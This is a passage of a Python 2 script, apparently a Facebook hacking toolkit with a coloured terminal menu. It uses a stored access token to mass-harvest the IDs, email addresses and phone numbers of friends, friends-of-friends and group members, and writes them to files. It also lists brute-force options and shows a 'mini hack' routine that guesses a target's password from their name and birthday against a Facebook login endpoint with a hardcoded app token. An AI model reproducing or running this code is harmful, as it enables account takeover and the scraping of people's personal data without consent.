try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;93m║--\033[1;93m> \033[1;93m1.\033[1;94m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m2.\033[1;94m Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m3.\033[1;94m Super Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m4.\033[1;94m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m5.\033[1;94m Yahoo Checker"
print "\033[1;93m║--\033[1;93m> \033[1;93m0.\033[1;94m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;95m╚═\033[1;95mD \033[1;95m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
